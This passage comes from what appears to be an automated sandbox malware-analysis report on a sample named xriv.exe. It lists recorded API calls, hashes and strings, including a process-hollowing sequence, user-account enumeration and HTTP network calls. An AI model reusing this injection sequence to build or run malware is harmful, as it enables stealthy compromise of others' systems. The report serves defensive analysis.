                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: abcc45b2a00496743f05c577563d3ca391fc4193dcb00d7c407017f80dd55bbf
                                                                        • Instruction ID: 40e04954ba0217f32e07e94cfa0980fe70b9ecc6974ec9d10b5617a415090ce1
                                                                        • Opcode Fuzzy Hash: abcc45b2a00496743f05c577563d3ca391fc4193dcb00d7c407017f80dd55bbf
                                                                        • Instruction Fuzzy Hash: 4ED06C3200014DBFDF128F85DD46EDA3FAAFB88714F014000BE5856020C736E831AB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 010A38E6
                                                                        • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 010A394B
                                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 010A3964
                                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 010A397F
                                                                        • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 010A39A3
                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 010A39BE
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 010A39C5
                                                                        • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 010A39ED
                                                                        • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 010A3A0E
                                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 010A3A5A
                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 010A3A96
                                                                        • SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 010A3AB2
                                                                        • ResumeThread.KERNEL32(?,?,?,00000000), ref: 010A3ABE
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000), ref: 010A3ACC
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 010A3AED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                        • String ID: $NtUnmapViewOfSection$ntdll.dll
                                                                        • API String ID: 4033543172-1522589568
                                                                        • Opcode ID: 44b50a08cc3faeb878059016370a8483c17c8a4c6fe0dad10c6ab467103edee9
                                                                        • Instruction ID: 9858a7caa7a620d59d844fc0f69277194808cecb3db73dcd92f75f3fa1f43079
                                                                        • Opcode Fuzzy Hash: 44b50a08cc3faeb878059016370a8483c17c8a4c6fe0dad10c6ab467103edee9
                                                                        • Instruction Fuzzy Hash: 39B1A471A00218EFDB21CF68DC45BEABBB5FF44714F504199F585AA2C0D776A980CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateMutexW.KERNEL32(00000000,00000000,?,010D918C,C73353B8,?,00000000,00000000), ref: 010A7F61
                                                                        • GetLastError.KERNEL32(?,00000000,00000000), ref: 010A7F67
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateErrorLastMutex
                                                                        • String ID:
                                                                        • API String ID: 1925916568-0
                                                                        • Opcode ID: e67f192b95928e37f1e92f518554146f96f5176673957ed5a24562dadbb85cab
                                                                        • Instruction ID: 32f50b147a15ba284e55b20966ccd898d7792c9338bd19c7e0c2cc609640cf85
                                                                        • Opcode Fuzzy Hash: e67f192b95928e37f1e92f518554146f96f5176673957ed5a24562dadbb85cab
                                                                        • Instruction Fuzzy Hash: 67227971A001089FEB18DFA8CC88BDDBF76EF84311F948169E585AB2D4DB359A80CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$InformationTimeZone
                                                                        • String ID:
                                                                        • API String ID: 597776487-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 010B7B12
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FeaturePresentProcessor
                                                                        • String ID:
                                                                        • API String ID: 2325560087-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetUserNameW.ADVAPI32(00000000,?), ref: 010A3132
                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 010A3147
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 010A314A
                                                                        • GetUserNameW.ADVAPI32(00000000,?), ref: 010A3158
                                                                        • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 010A317B
                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 010A3186
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 010A3189
                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 010A3199
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 010A319C
                                                                        • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 010A31C6
                                                                        • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 010A31D9
                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 010A32D5
                                                                        • HeapFree.KERNEL32(00000000), ref: 010A32DE
                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A32E3
                                                                        • HeapFree.KERNEL32(00000000), ref: 010A32E6
                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A32ED
                                                                        • HeapFree.KERNEL32(00000000), ref: 010A32F0
                                                                        • LocalFree.KERNEL32(00000000), ref: 010A32F5
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                                        • String ID:
                                                                        • API String ID: 3326663573-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ___free_lconv_mon.LIBCMT ref: 010C1705
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C12BB
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C12CD
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C12DF
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C12F1
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C1303
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C1315
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C1327
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C1339
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C134B
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C135D
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C136F
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C1381
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C1393
                                                                        • _free.LIBCMT ref: 010C16FA
                                                                          • Part of subcall function 010BD653: HeapFree.KERNEL32(00000000,00000000,?,010C142F,?,00000000,?,?,?,010C1456,?,00000007,?,?,010C1858,?), ref: 010BD669
                                                                          • Part of subcall function 010BD653: GetLastError.KERNEL32(?,?,010C142F,?,00000000,?,?,?,010C1456,?,00000007,?,?,010C1858,?,?), ref: 010BD67B
                                                                        • _free.LIBCMT ref: 010C171C
                                                                        • _free.LIBCMT ref: 010C1731
                                                                        • _free.LIBCMT ref: 010C173C
                                                                        • _free.LIBCMT ref: 010C175E
                                                                        • _free.LIBCMT ref: 010C1771
                                                                        • _free.LIBCMT ref: 010C177F
                                                                        • _free.LIBCMT ref: 010C178A
                                                                        • _free.LIBCMT ref: 010C17C2
                                                                        • _free.LIBCMT ref: 010C17C9
                                                                        • _free.LIBCMT ref: 010C17E6
                                                                        • _free.LIBCMT ref: 010C17FE
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                        • String ID:
                                                                        • API String ID: 161543041-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 010B8CC2
                                                                        • type_info::operator==.LIBVCRUNTIME ref: 010B8CE9
                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 010B8DF5
                                                                        • CatchIt.LIBVCRUNTIME ref: 010B8E4A
                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 010B8ED0
                                                                        • _UnwindNestedFrames.LIBCMT ref: 010B8F57
                                                                        • CallUnexpected.LIBVCRUNTIME ref: 010B8F72
                                                                        Strings
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                        • String ID: csm$csm$csm
                                                                        • API String ID: 4234981820-393685449
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • _free.LIBCMT ref: 010BDE42
                                                                          • Part of subcall function 010BD653: HeapFree.KERNEL32(00000000,00000000,?,010C142F,?,00000000,?,?,?,010C1456,?,00000007,?,?,010C1858,?), ref: 010BD669
                                                                          • Part of subcall function 010BD653: GetLastError.KERNEL32(?,?,010C142F,?,00000000,?,?,?,010C1456,?,00000007,?,?,010C1858,?,?), ref: 010BD67B
                                                                        • _free.LIBCMT ref: 010BDE4E
                                                                        • _free.LIBCMT ref: 010BDE59
                                                                        • _free.LIBCMT ref: 010BDE64
                                                                        • _free.LIBCMT ref: 010BDE6F
                                                                        • _free.LIBCMT ref: 010BDE7A
                                                                        • _free.LIBCMT ref: 010BDE85
                                                                        • _free.LIBCMT ref: 010BDE90
                                                                        • _free.LIBCMT ref: 010BDE9B
                                                                        • _free.LIBCMT ref: 010BDEA9
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • InternetOpenW.WININET(010D3F6C,00000000,00000000,00000000,00000000), ref: 010A871C
                                                                        • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 010A8740
                                                                        • HttpOpenRequestA.WININET(?,00000000), ref: 010A878A
                                                                        • HttpSendRequestA.WININET(?,00000000), ref: 010A884A
                                                                        • InternetReadFile.WININET(?,?,000003FF,?), ref: 010A88FC
                                                                        • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 010A89B0
                                                                        • InternetCloseHandle.WININET(?), ref: 010A89D7
                                                                        • InternetCloseHandle.WININET(?), ref: 010A89DF
                                                                        • InternetCloseHandle.WININET(?), ref: 010A89E7
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                                                                        • String ID:
                                                                        • API String ID: 1354133546-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$___from_strstr_to_strchr
                                                                        • String ID:
                                                                        • API String ID: 3409252457-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • _ValidateLocalCookies.LIBCMT ref: 010B85A7
                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 010B85AF
                                                                        • _ValidateLocalCookies.LIBCMT ref: 010B8638
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 010B8663
                                                                        • _ValidateLocalCookies.LIBCMT ref: 010B86B8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                        • String ID: csm
                                                                        • API String ID: 1170836740-1018135373
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: api-ms-$ext-ms-
                                                                        • API String ID: 0-537541572
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                          • Part of subcall function 010C1405: _free.LIBCMT ref: 010C142A
                                                                        • _free.LIBCMT ref: 010C148B
                                                                          • Part of subcall function 010BD653: HeapFree.KERNEL32(00000000,00000000,?,010C142F,?,00000000,?,?,?,010C1456,?,00000007,?,?,010C1858,?), ref: 010BD669
                                                                          • Part of subcall function 010BD653: GetLastError.KERNEL32(?,?,010C142F,?,00000000,?,?,?,010C1456,?,00000007,?,?,010C1858,?,?), ref: 010BD67B
                                                                        • _free.LIBCMT ref: 010C1496
                                                                        • _free.LIBCMT ref: 010C14A1
                                                                        • _free.LIBCMT ref: 010C14F5
                                                                        • _free.LIBCMT ref: 010C1500
                                                                        • _free.LIBCMT ref: 010C150B
                                                                        • _free.LIBCMT ref: 010C1516
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetConsoleCP.KERNEL32(?,010A5140,00000000), ref: 010C2B40
                                                                        • __fassign.LIBCMT ref: 010C2D1F
                                                                        • __fassign.LIBCMT ref: 010C2D3C
                                                                        • WriteFile.KERNEL32(?,010A5140,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 010C2D84
                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 010C2DC4
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 010C2E70
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                        • String ID:
                                                                        • API String ID: 4031098158-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,010B8887,010B8476,010B7AC4), ref: 010B889E
                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 010B88AC
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 010B88C5
                                                                        • SetLastError.KERNEL32(00000000,010B8887,010B8476,010B7AC4), ref: 010B8917
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLastValue___vcrt_
                                                                        • String ID:
                                                                        • API String ID: 3852720340-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe, xrefs: 010C0033
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                        • API String ID: 0-2143882575
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _wcsrchr
                                                                        • String ID: .bat$.cmd$.com$.exe
                                                                        • API String ID: 1752292252-4019086052
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: api-ms-
                                                                        • API String ID: 0-2084034818
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,010BA9D8,010BE000,?,010BA9A0,010BAF26,?,010BE000), ref: 010BA9F8
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 010BAA0B
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,010BA9D8,010BE000,?,010BA9A0,010BAF26,?,010BE000), ref: 010BAA2E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 4061214504-1276376045
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,010BB0E0), ref: 010BB1D0
                                                                        • GetFileInformationByHandle.KERNEL32(?,?), ref: 010BB22A
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,010BB0E0,?,000000FF,00000000,00000000), ref: 010BB2B8
                                                                        • __dosmaperr.LIBCMT ref: 010BB2BF
                                                                        • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 010BB2FC
                                                                          • Part of subcall function 010BB524: __dosmaperr.LIBCMT ref: 010BB559
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                        • String ID:
                                                                        • API String ID: 1206951868-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • _free.LIBCMT ref: 010C13B4
                                                                          • Part of subcall function 010BD653: HeapFree.KERNEL32(00000000,00000000,?,010C142F,?,00000000,?,?,?,010C1456,?,00000007,?,?,010C1858,?), ref: 010BD669
                                                                          • Part of subcall function 010BD653: GetLastError.KERNEL32(?,?,010C142F,?,00000000,?,?,?,010C1456,?,00000007,?,?,010C1858,?,?), ref: 010BD67B
                                                                        • _free.LIBCMT ref: 010C13C6
                                                                        • _free.LIBCMT ref: 010C13D8
                                                                        • _free.LIBCMT ref: 010C13EA
                                                                        • _free.LIBCMT ref: 010C13FC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
